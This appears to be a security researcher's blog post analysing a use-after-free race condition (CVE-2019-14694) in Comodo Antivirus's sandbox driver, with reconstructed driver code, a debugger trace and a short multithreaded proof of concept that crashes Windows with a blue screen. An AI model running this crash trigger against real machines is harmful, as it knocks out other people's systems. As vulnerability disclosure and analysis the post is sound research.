Tuesday, August 13, 2019

Comodo Antivirus - Sandbox Race Condition Use-After-Free (CVE-2019-14694)

Hello,
In this blog post I'm going to share an analysis of a recent finding in yet another antivirus, this time Comodo AV. After reading this awesome research by Tenable, I decided to take a look myself and play a bit with the sandbox.

I ended up finding a vulnerability by accident in the kernel-mode part of the sandbox, implemented in the minifilter driver cmdguard.sys. Although the impact is just a BSOD (Blue Screen of Death), I found the vulnerability interesting enough to be worth a write-up.

Comodo's sandbox filters file I/O, allowing contained processes to read from the volume normally while redirecting all writes to '\VTRoot\HarddiskVolume#\', a directory located at the root of the volume on which Windows is installed.

For each file or directory opened (IRP_MJ_CREATE) by a contained process, the preoperation callback allocates an internal structure and initializes several of its fields.

The callbacks for the minifilter's data queue, a cancel-safe IRP queue, are initialized at offset 0x140 of the structure as the disassembly below shows. In addition, the queue list head is initialized at offset 0x1C0, and the first QWORD of the same struct is set to 0xB5C0B5C0B5C0B5C.


(Figure 1)
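To make the rest of the analysis easier to follow, here is a rough C sketch of what the IRP_MJ_CREATE preoperation callback appears to set up. The offsets and the magic value come from the disassembly; the structure name, field names, pool tag and the names of the CBDQ callbacks (apart from InsertIoCallback, which we will come back to) are my own invention:

    #include <fltKernel.h>

    // Hypothetical layout of the per-open structure (field names are mine).
    typedef struct _CMD_STREAM_OBJECT {
        ULONGLONG               Magic;           // +0x000: 0xB5C0B5C0B5C0B5C
        UCHAR                   Unknown[0x138];  // fields not relevant to the bug
        FLT_CALLBACK_DATA_QUEUE Cbdq;            // +0x140: cancel-safe callback data queue
        LIST_ENTRY              QueueHead;       // +0x1C0: list head for pended requests
        KSPIN_LOCK              QueueLock;       // lock protecting the list (assumption)
    } CMD_STREAM_OBJECT, *PCMD_STREAM_OBJECT;

    PCMD_STREAM_OBJECT SetupStreamObject(PCFLT_RELATED_OBJECTS FltObjects)
    {
        PCMD_STREAM_OBJECT obj = ExAllocatePoolWithTag(NonPagedPool, sizeof(*obj), 'xbsC');
        if (obj == NULL) {
            return NULL;
        }

        RtlZeroMemory(obj, sizeof(*obj));
        obj->Magic = 0xB5C0B5C0B5C0B5Cull;
        InitializeListHead(&obj->QueueHead);
        KeInitializeSpinLock(&obj->QueueLock);

        // Register the CBDQ callbacks seen in Figure 1.
        FltCbdqInitialize(FltObjects->Instance, &obj->Cbdq,
                          InsertIoCallback, RemoveIoCallback, PeekNextIoCallback,
                          AcquireQueueLock, ReleaseQueueLock, CompleteCanceledIoCallback);
        return obj;
    }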

Next, a stream handle context is set for the file object and a pointer to the previously discussed internal structure is stored at offset 0x28 of the context.
Keep in mind that a stream handle context is unique per file object (user-mode handle).

(Figure 2)
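In C terms, and keeping the invented names from the previous sketch, the context setup looks roughly like this (the +0x28 offset is from the disassembly, everything else is a guess):

    // Hypothetical layout of the stream handle context.
    typedef struct _CMD_STREAMHANDLE_CONTEXT {
        UCHAR              Reserved[0x28];   // other fields, not relevant here
        PCMD_STREAM_OBJECT StreamObject;     // +0x28: the per-open structure from Figure 1
    } CMD_STREAMHANDLE_CONTEXT, *PCMD_STREAMHANDLE_CONTEXT;

    NTSTATUS AttachStreamHandleContext(PCFLT_RELATED_OBJECTS FltObjects, PCMD_STREAM_OBJECT Obj)
    {
        PCMD_STREAMHANDLE_CONTEXT ctx = NULL;
        NTSTATUS status = FltAllocateContext(FltObjects->Filter, FLT_STREAMHANDLE_CONTEXT,
                                             sizeof(*ctx), NonPagedPool, (PFLT_CONTEXT *)&ctx);
        if (!NT_SUCCESS(status)) {
            return status;
        }

        RtlZeroMemory(ctx, sizeof(*ctx));
        ctx->StreamObject = Obj;

        // One stream handle context per FILE_OBJECT, i.e. per user-mode handle.
        status = FltSetStreamHandleContext(FltObjects->Instance, FltObjects->FileObject,
                                           FLT_SET_CONTEXT_KEEP_IF_EXISTS, ctx, NULL);
        FltReleaseContext(ctx);
        return status;
    }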

The only place where the minifilter queues IRPs to this data queue is the IRP_MJ_DIRECTORY_CONTROL preoperation callback, and only for the minor function IRP_MN_NOTIFY_CHANGE_DIRECTORY.

Before the IRP_MJ_DIRECTORY_CONTROL callback checks the minor function, it first verifies that a stream handle context is available and that a data queue is already present within it: it checks whether the pointer at offset 0x28 is valid and whether the magic value 0xB5C0B5C0B5C0B5C is present.


(Figure 3)
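A sketch of these checks, reusing the structures defined above (the helper name is mine):

    PCMD_STREAM_OBJECT GetStreamObjectForRequest(PCFLT_RELATED_OBJECTS FltObjects)
    {
        PCMD_STREAMHANDLE_CONTEXT ctx = NULL;
        PCMD_STREAM_OBJECT obj = NULL;

        if (!NT_SUCCESS(FltGetStreamHandleContext(FltObjects->Instance,
                                                  FltObjects->FileObject,
                                                  (PFLT_CONTEXT *)&ctx))) {
            return NULL;    // no stream handle context -> nothing to queue to
        }

        obj = ctx->StreamObject;    // pointer stored at +0x28 (Figure 2)
        if (obj == NULL || obj->Magic != 0xB5C0B5C0B5C0B5Cull) {
            obj = NULL;             // pointer or magic check failed
        }

        FltReleaseContext(ctx);
        return obj;
    }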

Before the call to FltCbdqInsertIo, the stream handle context is retrieved and a non-paged pool allocation of size 0xE0 is made, whose pointer is stored in RDI as shown below.


(Figure 4)

Later on, this allocation is stored inside the FilterContext array of the FLT_CALLBACK_DATA structure for this request and is passed as a context to the insert routine.

(Figure 5)
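Putting Figures 3 to 5 together, the interesting part of the IRP_MJ_DIRECTORY_CONTROL preoperation callback looks roughly like this (the 0xE0 size comes from the disassembly; the FilterContext slot and the pool tag are illustrative):

    FLT_PREOP_CALLBACK_STATUS DirectoryControlPreOperation(PFLT_CALLBACK_DATA Data,
                                                           PCFLT_RELATED_OBJECTS FltObjects,
                                                           PVOID *CompletionContext)
    {
        UNREFERENCED_PARAMETER(CompletionContext);

        PCMD_STREAM_OBJECT obj = GetStreamObjectForRequest(FltObjects);
        if (obj == NULL || Data->Iopb->MinorFunction != IRP_MN_NOTIFY_CHANGE_DIRECTORY) {
            return FLT_PREOP_SUCCESS_NO_CALLBACK;
        }

        // Non-paged allocation of size 0xE0 (Figure 4).
        PVOID queueCtx = ExAllocatePoolWithTag(NonPagedPool, 0xE0, 'xbsC');
        if (queueCtx == NULL) {
            return FLT_PREOP_SUCCESS_NO_CALLBACK;
        }
        RtlZeroMemory(queueCtx, 0xE0);
        // ... the 0xE0 structure is initialized here ...

        // Saved in the callback data so IRP_MJ_CLEANUP can find it again (Figure 9).
        Data->FilterContext[2] = queueCtx;

        // queueCtx is also handed to FltCbdqInsertIo, which forwards it to InsertIoCallback.
        if (!NT_SUCCESS(FltCbdqInsertIo(&obj->Cbdq, Data, NULL, queueCtx))) {
            ExFreePoolWithTag(queueCtx, 'xbsC');
            return FLT_PREOP_SUCCESS_NO_CALLBACK;
        }

        return FLT_PREOP_PENDING;   // the notify request stays pended in the queue
    }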

FltCbdqInsertIo will eventually call the InsertIoCallback (seen initialized in Figure 1). Examining this routine, we see that it queues the callback data structure to the data queue and then invokes FltQueueDeferredIoWorkItem to insert a work item that will be dispatched in a system thread later on.

As you can see from the disassembly below, the work item's dispatch routine (DeferredWorkItemRoutine) receives the newly allocated non-paged memory (Figure 4) as a context.

(Figure 6)
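In code, InsertIoCallback boils down to something like the sketch below (it follows the filter manager's PFLT_CALLBACK_DATA_QUEUE_INSERT_IO prototype; InsertContext is the 0xE0 allocation handed to FltCbdqInsertIo above, and DeferredWorkItemRoutine is the dispatch routine from the post):

    NTSTATUS InsertIoCallback(PFLT_CALLBACK_DATA_QUEUE Cbdq,
                              PFLT_CALLBACK_DATA Cbd,
                              PVOID InsertContext)
    {
        PCMD_STREAM_OBJECT obj = CONTAINING_RECORD(Cbdq, CMD_STREAM_OBJECT, Cbdq);

        // Pend the notify request on the list at +0x1C0.
        InsertTailList(&obj->QueueHead, &Cbd->QueueLinks);

        // Schedule a work item that will run later in a system thread, with the
        // same non-paged 0xE0 allocation as its context.
        PFLT_DEFERRED_IO_WORKITEM workItem = FltAllocateDeferredIoWorkItem();
        if (workItem != NULL) {
            FltQueueDeferredIoWorkItem(workItem, Cbd, DeferredWorkItemRoutine,
                                       DelayedWorkQueue, InsertContext);
        }

        return STATUS_SUCCESS;
    }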
Here is a quick recap of what we have seen so far:
  • For every file/directory open, a data queue is initialized and stored at offset 0x140 of an internal structure.
  • A context is allocated in which a pointer to the previous structure is stored at offset 0x28. This context is set as a stream handle context.
  • IRP_MJ_DIRECTORY_CONTROL checks if the minor function is IRP_MN_NOTIFY_CHANGE_DIRECTORY.
  • If that's the case, a non-paged pool allocation of size 0xE0 is made and initialized.
  • The allocation is stored inside the FLT_CALLBACK_DATA and is passed to FltCbdqInsertIo as a context.
  • FltCbdqInsertIo ends up calling the insert callback (InsertIoCallback) with the non-paged pool allocation as a context.
  • The insert callback inserts the request into the queue and queues a deferred work item with the same allocation as a context.
It is very simple for a sandboxed user-mode process to make the minifilter take this code path: it only needs to call the FindFirstChangeNotificationA API on an arbitrary directory.
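From a contained process, one call is enough to reach the queuing code (the directory and the notify filter chosen here are arbitrary):

    // Sends IRP_MJ_DIRECTORY_CONTROL with IRP_MN_NOTIFY_CHANGE_DIRECTORY for "C:\".
    HANDLE hNotify = FindFirstChangeNotificationA("C:\\", FALSE, FILE_NOTIFY_CHANGE_FILE_NAME);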

Let's carry on.

So, the work item's context (the non-paged pool allocation made by IRP_MJ_DIRECTORY_CONTROL for the directory change notification request) must be freed somewhere, right? This is accomplished by IRP_MJ_CLEANUP's preoperation routine.

As you might already know, IRP_MJ_CLEANUP is sent when the last handle of a file object is closed, so the callback must perform the janitor's work at this stage.

In this instance, the stream handle context is retrieved similarly to what we saw earlier. Next, the queue is disabled so that no new requests can be queued, and then the queue cleanup is done by "DoCleanup".

(Figure 8)

As shown below, this subroutine dequeues the pended requests from the data queue, retrieves the context structure saved in the FLT_CALLBACK_DATA, completes the operation, and then frees the context.

(Figure 9)
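A simplified sketch of this cleanup path, again with the invented names from above (in the driver the queue is disabled in the IRP_MJ_CLEANUP preoperation callback and the draining is done by "DoCleanup"; both steps are merged here):

    VOID CleanupPendedNotifies(PCMD_STREAM_OBJECT Obj)
    {
        PFLT_CALLBACK_DATA cbd;

        FltCbdqDisable(&Obj->Cbdq);    // no new requests can be queued from now on

        while ((cbd = FltCbdqRemoveNextIo(&Obj->Cbdq, NULL)) != NULL) {
            PVOID queueCtx = cbd->FilterContext[2];   // the 0xE0 context saved earlier

            FltCompletePendedPreOperation(cbd, FLT_PREOP_COMPLETE, NULL);

            // Freed here whether or not the deferred work item queued in
            // InsertIoCallback has run yet -- this is what makes the race possible.
            ExFreePoolWithTag(queueCtx, 'xbsC');
        }
    }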
We can trigger what we have seen so far from a contained process by:
  • Calling FindFirstChangeNotificationA on an arbitrary directory, e.g. "C:\": this sends IRP_MJ_DIRECTORY_CONTROL and causes the deferred work item to be queued.
  • Closing the handle: this sends IRP_MJ_CLEANUP.
What can go wrong here? The answer is the context being freed before the deferred work item is dispatched; the work item would then receive a freed context and use it (use-after-free).

In other words, we have to make the minifilter receive an IRP_MJ_CLEANUP request before the deferred work item queued in IRP_MJ_DIRECTORY_CONTROL is dispatched for execution.

When trying to reproduce the vulnerability with a single thread, I noticed that the work item is always dispatched before IRP_MJ_CLEANUP is received. This makes sense, since the work item queue contains few items at that point and dispatching a work item takes less time than all the work triggered by the subsequent call to CloseHandle.

So the idea here was to create multiple threads that call CloseHandle(FindFirstChangeNotificationA(..)) in an infinite loop, to saturate the work item queue as much as possible and delay the dispatching of work items until after the contexts are freed. A crash occurs once a work item accesses a freed context whose pool allocation has been corrupted by some new allocation.

Below is the proof of concept to reproduce the vulnerability:
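It simply spawns a number of threads that spin on CloseHandle(FindFirstChangeNotificationA(..)); the thread count, target directory and notify filter in this sketch are arbitrary:

    #include <windows.h>

    #define NUM_THREADS 32

    static DWORD WINAPI RaceThread(LPVOID Param)
    {
        (void)Param;
        for (;;) {
            // IRP_MJ_DIRECTORY_CONTROL: the 0xE0 context is allocated and a
            // deferred work item referencing it is queued.
            HANDLE h = FindFirstChangeNotificationA("C:\\", FALSE,
                                                    FILE_NOTIFY_CHANGE_FILE_NAME);
            if (h != INVALID_HANDLE_VALUE) {
                // IRP_MJ_CLEANUP: the same context is freed, possibly before
                // the work item has been dispatched.
                CloseHandle(h);
            }
        }
        return 0;
    }

    int main(void)
    {
        HANDLE threads[NUM_THREADS];

        for (int i = 0; i < NUM_THREADS; i++) {
            threads[i] = CreateThread(NULL, 0, RaceThread, NULL, 0, NULL);
        }

        // A BSOD is expected once a work item dereferences a freed, repurposed allocation.
        WaitForMultipleObjects(NUM_THREADS, threads, TRUE, INFINITE);
        return 0;
    }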



And here is a small WinDbg trace to see what happens in practice (the address in parentheses is the address of the context):
    1. [...]
       QueueWorkItem(fffffa8062dc6f20)
       DeferredWorkItem(fffffa8062dc6f20)
       ExFreePoolWithTag(fffffa8062dc6f20)
       [...]
    2. QueueWorkItem(fffffa80635d2ea0)
       ExFreePoolWithTag(fffffa80635d2ea0)
       QueueWorkItem(fffffa8062dd5c10)
       ExFreePoolWithTag(fffffa8062dd5c10)
       QueueWorkItem(fffffa8062dd6890)
       ExFreePoolWithTag(fffffa8062dd6890)
       QueueWorkItem(fffffa8062ddac80)
       ExFreePoolWithTag(fffffa8062ddac80)
       QueueWorkItem(fffffa80624cd5e0)
       [...]
    3. DeferredWorkItem(fffffa80635d2ea0)
In (1) everything is normal: the work item is queued, dispatched, and then the pool allocation it uses is freed.

In (2) things start going wrong: the work item is queued, but the context is freed before it is dispatched.

In (3) the deferred work item is dispatched with freed and corrupted memory as its context, causing an access violation and thus a BSOD.

We see in this case that the freed pool allocation was entirely repurposed and is now part of a file object:

(Figure 10)

Reproducing the bug, you will encounter an access violation at this part of the code:

(Figure 11)

And as we can see, it expects multiple pointers to be valid, including a resource pointer, which makes exploitation non-trivial.

That's all for this article, until next time :)

Follow me on Twitter: here